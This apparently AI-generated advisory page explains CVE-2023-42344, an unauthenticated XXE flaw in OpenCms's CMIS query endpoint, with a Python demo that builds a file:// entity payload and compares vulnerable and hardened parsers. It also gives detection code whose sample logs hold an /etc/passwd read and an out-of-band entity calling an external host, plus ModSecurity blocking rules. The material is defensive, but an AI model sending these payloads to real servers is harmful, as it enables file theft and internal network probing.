CVE-2023-42344 Overview
CVE-2023-42344 is an XML External Entity (XXE) vulnerability affecting Alkacon OpenCms versions prior to 10.5.1. The flaw resides in the Apache Chemistry servlet exposed by OpenCms, specifically the cmis-online/query endpoint. Remote unauthenticated attackers can submit crafted XML payloads that trigger external entity resolution. Successful exploitation allows the attacker to read sensitive files from the server, perform internal network reconnaissance, and potentially exfiltrate credentials or configuration data. The vulnerability is categorized under [CWE-611] (Improper Restriction of XML External Entity Reference).
Critical Impact
Unauthenticated remote attackers can extract sensitive server-side files and probe internal networks through XXE injection on the OpenCms Chemistry servlet.
Affected Products
- Alkacon OpenCms versions prior to 10.5.1
- OpenCms deployments exposing the Apache Chemistry CMIS servlet
- Web applications using the cmis-online/query endpoint
Discovery Timeline
- 2026-05-08 - CVE-2023-42344 published to NVD
- 2026-05-08 - Last updated in NVD database
Technical Details for CVE-2023-42344
Vulnerability Analysis
The vulnerability stems from improper XML parser configuration in the OpenCms integration of the Apache Chemistry CMIS (Content Management Interoperability Services) servlet. The servlet accepts XML-formatted query requests at the cmis-online/query path. The underlying XML parser processes external entity declarations without restriction. Attackers can define malicious DOCTYPE entities that reference local files via file:// URIs or remote resources via http:// URIs.
When the parser resolves these entities, the referenced file contents or HTTP response data are either reflected in the server response (in-band XXE) or delivered to an attacker-controlled host (out-of-band XXE). Because the endpoint requires no authentication, any attacker who can reach the OpenCms instance over the network can exploit it; no session or user interaction on the target is involved. The Watchtowr Labs analysis demonstrates extraction of system files and internal service enumeration through both blind and in-band XXE techniques.
Root Cause
The root cause is the use of a default-configured XML parser that does not disable external entity resolution and DTD processing. Apache Chemistry's query handler parses user-supplied XML without applying secure parser features such as disallow-doctype-decl (which rejects any DOCTYPE and with it every entity declaration) or, where DTDs must be accepted, the external-general-entities and external-parameter-entities features set to false. FEATURE_SECURE_PROCESSING adds entity-expansion limits on top of these but is not a substitute for them on its own.
Attack Vector
An attacker sends an HTTP POST request to the cmis-online/query endpoint containing an XML body with a malicious DOCTYPE declaration. The DOCTYPE defines an external entity referencing a local file path or attacker-controlled URL. The OpenCms server parses the XML, resolves the entity, and returns the referenced content in the response or sends it out-of-band to the attacker's listener.
Technical details and proof-of-concept exploitation are documented in the Watchtowr Labs Analysis and the Nuclei Templates GitHub Issue Discussion.
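The parser misconfiguration and the in-band attack described in the Root Cause and Attack Vector sections, as an added example that is not OpenCms or Apache Chemistry code. It uses Python's standard-library xml.sax parser rather than the Java parser inside OpenCms, because the mistake is the same: leaving external general entity resolution switched on and accepting a DOCTYPE from the client. The "hardened" parser refuses any DOCTYPE, the same idea as the Java disallow-doctype-decl feature. The target file, its contents and the CMIS query text are all constructed for the demo.

```python
# Added example (not OpenCms or Apache Chemistry code): the XXE pattern from the
# Root Cause and Attack Vector sections, shown with Python's stdlib xml.sax parser.
# The target file, its contents and the CMIS query text are all constructed here.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


def build_xxe_payload(target_path: str) -> bytes:
    """Return a query body shaped like the one the advisory describes: the internal
    DTD subset declares an external general entity backed by file://, and the
    entity is referenced inside the query text so that, if the parser resolves it,
    the file content is reflected in-band (constructed payload, local file only)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE query [\n'
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        ']>\n'
        '<query>\n'
        "  <statement>SELECT cmis:name FROM cmis:document WHERE cmis:name = '&xxe;'</statement>\n"
        '</query>\n'
    ).encode("utf-8")


class _TextCollector(ContentHandler):
    """Collects character data, i.e. what an application would echo or act on."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class DoctypeRejected(ValueError):
    """Raised by the hardened parser on any DOCTYPE (the disallow-doctype-decl idea)."""


class _RejectDoctype:
    """Lexical handler that fails on the first DOCTYPE, before any entity is declared."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not accepted on this endpoint")

    # Remaining lexical-handler callbacks: nothing to do.
    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def parse_text(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse and return the document's text. True reproduces the vulnerable
    configuration (SYSTEM entities are fetched and inlined); False is the stdlib
    default since Python 3.7.1, which leaves the entity reference unexpanded."""
    collector = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def parse_text_hardened(xml_bytes: bytes) -> str:
    """Hardened equivalent: external entities off and any DOCTYPE refused outright."""
    collector = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, _RejectDoctype())
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo() -> dict:
    """Write a constructed secret to a temp file, run the three parsers, clean up."""
    fd, path = tempfile.mkstemp(prefix="opencms-xxe-demo-", text=True)
    with os.fdopen(fd, "w") as fh:
        fh.write("db.password=s3cr3t-constructed-value\n")  # constructed, not a real secret
    try:
        payload = build_xxe_payload(path)
        leaked = parse_text(payload, resolve_external_entities=True)
        default = parse_text(payload, resolve_external_entities=False)
        try:
            parse_text_hardened(payload)
            rejected = False
        except DoctypeRejected:
            rejected = True
    finally:
        os.unlink(path)
    return {"leaked": leaked, "default": default, "rejected": rejected}


if __name__ == "__main__":
    result = demo()
    print("vulnerable parser leaked the file:", "s3cr3t" in result["leaked"])
    print("default parser leaked the file:  ", "s3cr3t" in result["default"])
    print("hardened parser rejected DOCTYPE:", result["rejected"])
```

Rejecting the DOCTYPE outright is the stronger fix: it removes parameter entities, external DTDs and entity-expansion attacks in one step, which merely turning off external general entities (the middle case) does not. The same ordering applies to the Java features named in the Root Cause section.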
Detection Methods for CVE-2023-42344
Indicators of Compromise
- HTTP POST requests to URIs containing cmis-online/query from external or unexpected sources
- XML request bodies containing a <!DOCTYPE or <!ENTITY declaration, a SYSTEM identifier, or file:// and http:// entity targets
- Outbound HTTP, FTP, or DNS connections from the OpenCms server to unfamiliar hosts following Chemistry servlet requests
- Application logs showing XML parsing errors referencing external entities or unresolved system identifiers
Detection Strategies
- Inspect web server and application logs for requests targeting the cmis-online/query path with XML content types
- Deploy web application firewall (WAF) signatures that flag DOCTYPE and ENTITY declarations in request bodies
- Monitor egress traffic from OpenCms hosts for anomalous outbound connections to non-business destinations
- Hunt for sequential reads of sensitive files such as /etc/passwd, web.xml, or OpenCms configuration files by the Java process
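The indicators of compromise and the detection strategies above, turned into code and run over sample telemetry. This is an added example, not tooling from the page or from OpenCms. The request records (reverse-proxy log entries with bodies captured), the egress flow records, the internal address ranges, the allow-listed destination and all timestamps and IPs are constructed for the demo.

```python
# Added example (not from the page or from OpenCms): the indicators and hunting
# steps above turned into code and run over constructed sample telemetry. The
# request records, flow records, IPs and timestamps are all made up for the demo.
import ipaddress
import re
from datetime import datetime

TARGET_PATH = "/cmis-online/query"
# DOCTYPE or ENTITY declaration, a SYSTEM identifier, or a file:// target.
XXE_MARKERS = re.compile(r"<!(?:DOCTYPE|ENTITY)\b|\bSYSTEM\s+[\"']|file://", re.IGNORECASE)
# Constructed view of the organisation's own address space and expected egress.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_EGRESS = {"10.0.9.4"}  # e.g. the database host

# Constructed reverse-proxy records with bodies captured (verbose body logging on).
SAMPLE_REQUESTS = [
    {"ts": "2024-03-01T10:00:01", "src": "10.0.5.20", "method": "POST",
     "uri": "/cmis-online/query", "content_type": "application/xml",
     "body": '<?xml version="1.0"?><query><statement>SELECT * FROM cmis:document</statement></query>'},
    {"ts": "2024-03-01T10:05:00", "src": "203.0.113.7", "method": "POST",
     "uri": "/opencms/cmis-online/query", "content_type": "text/xml",
     "body": '<?xml version="1.0"?><!DOCTYPE q [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
             "<query><statement>SELECT * FROM cmis:document WHERE cmis:name = '&x;'</statement></query>"},
    {"ts": "2024-03-01T10:05:02", "src": "203.0.113.7", "method": "POST",
     "uri": "/opencms/cmis-online/query", "content_type": "text/xml",
     "body": '<?xml version="1.0"?><!DOCTYPE q [<!ENTITY % p SYSTEM "http://203.0.113.7/x.dtd"> %p;]><query/>'},
    {"ts": "2024-03-01T10:06:00", "src": "10.0.5.21", "method": "GET",
     "uri": "/index.html", "content_type": "", "body": ""},
]

# Constructed egress flow records seen from the OpenCms host.
SAMPLE_EGRESS = [
    {"ts": "2024-03-01T10:00:03", "dst": "10.0.9.4", "dport": 5432},
    {"ts": "2024-03-01T10:05:05", "dst": "203.0.113.7", "dport": 80},
]


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify_request(rec: dict) -> list:
    """Return the indicator names a request record triggers (empty if benign)."""
    reasons = []
    if rec["method"].upper() != "POST" or TARGET_PATH not in rec["uri"]:
        return reasons
    if XXE_MARKERS.search(rec["body"]):
        reasons.append("xxe-markers-in-body")
    if not is_internal(rec["src"]):
        reasons.append("post-from-external-source")
    return reasons


def correlate_egress(flagged: list, egress: list, window_seconds: int = 120) -> list:
    """Attribute each outbound connection to a non-allow-listed host to the most
    recent flagged request inside the window: the blind / out-of-band XXE signal."""
    findings = []
    for flow in egress:
        if flow["dst"] in ALLOWED_EGRESS:
            continue
        flow_ts = datetime.fromisoformat(flow["ts"])
        candidates = [
            r for r in flagged
            if 0 <= (flow_ts - datetime.fromisoformat(r["ts"])).total_seconds() <= window_seconds
        ]
        if candidates:
            req = max(candidates, key=lambda r: r["ts"])
            delay = int((flow_ts - datetime.fromisoformat(req["ts"])).total_seconds())
            findings.append({"request_ts": req["ts"], "src": req["src"],
                             "dst": flow["dst"], "dport": flow["dport"], "delay_s": delay})
    return findings


def detect(requests: list, egress: list) -> dict:
    """Run both checks: per-request indicators, then egress correlation."""
    flagged = [{**rec, "reasons": classify_request(rec)}
               for rec in requests if classify_request(rec)]
    return {"flagged": flagged, "oob": correlate_egress(flagged, egress)}


if __name__ == "__main__":
    result = detect(SAMPLE_REQUESTS, SAMPLE_EGRESS)
    for f in result["flagged"]:
        print(f"{f['ts']} {f['src']} POST {f['uri']}: {', '.join(f['reasons'])}")
    for o in result["oob"]:
        print(f"{o['request_ts']} request from {o['src']} followed {o['delay_s']}s later "
              f"by egress to {o['dst']}:{o['dport']}")
```

A regex over the raw body misses payloads sent in an encoding the parser accepts but the rule does not expect (UTF-16 bodies, for example), so treat the body match as a triage signal and keep the egress correlation, which does not depend on how the payload was written.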
Monitoring Recommendations
- Enable request body logging on reverse proxies fronting OpenCms so the XML payloads are captured; scope it to the cmis-online path and cap the captured size, since bodies on other paths may carry credentials
- Forward application and network telemetry to a centralized data lake for correlation across hosts
- Alert on first-seen outbound DNS resolutions from OpenCms servers, which are common in blind XXE exfiltration
- Track the EPSS score for this CVE and tighten the hunt cadence while its percentile stays high, as it currently is
How to Mitigate CVE-2023-42344
Immediate Actions Required
- Upgrade Alkacon OpenCms to version 10.5.1 or later, where the XML parser configuration has been hardened
- Restrict access to the cmis-online/query endpoint via network ACLs or reverse proxy rules until patching is complete
- Audit OpenCms logs for prior exploitation attempts referencing DOCTYPE or external entities
- Rotate credentials and secrets that may have been exposed in files readable by the OpenCms process
Patch Information
Upgrade to Alkacon OpenCms 10.5.1 or any later supported release. The fix disables external entity resolution and DTD processing in the Apache Chemistry query handler. Verify the deployed version after upgrade, then confirm the parser configuration directly: submit a query body to cmis-online/query that declares a harmless internal entity in a DOCTYPE and references it, and check that the request is rejected (or the reference left unexpanded) rather than echoed back with the entity expanded.
Workarounds
- Block external access to /cmis-online/* paths at the load balancer or reverse proxy
- Remove or disable the Chemistry servlet mapping in web.xml if CMIS functionality is not required
- Apply WAF rules that reject XML payloads containing <!DOCTYPE or <!ENTITY declarations on the affected endpoint
- Restrict the OpenCms service account's filesystem permissions to limit data exposure if XXE is exploited
# Configuration example: WAF rule pattern to block XXE payloads
# ModSecurity rules to reject DOCTYPE/ENTITY in Chemistry servlet requests.
# Body inspection must be on, and because ModSecurity does not populate
# REQUEST_BODY for XML content types by default, force it for this path first.
SecRequestBodyAccess On
SecRule REQUEST_URI "@contains /cmis-online/query" \
    "id:1001000,phase:1,pass,nolog,ctl:forceRequestBodyVariable=On"
SecRule REQUEST_URI "@contains /cmis-online/query" \
    "id:1001001,phase:2,deny,status:403,log,\
    msg:'Potential XXE in OpenCms Chemistry servlet',chain"
    SecRule REQUEST_BODY "@rx (?i)<!(DOCTYPE|ENTITY)\b|\bSYSTEM\s+[\x22\x27]" \
        "t:none"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.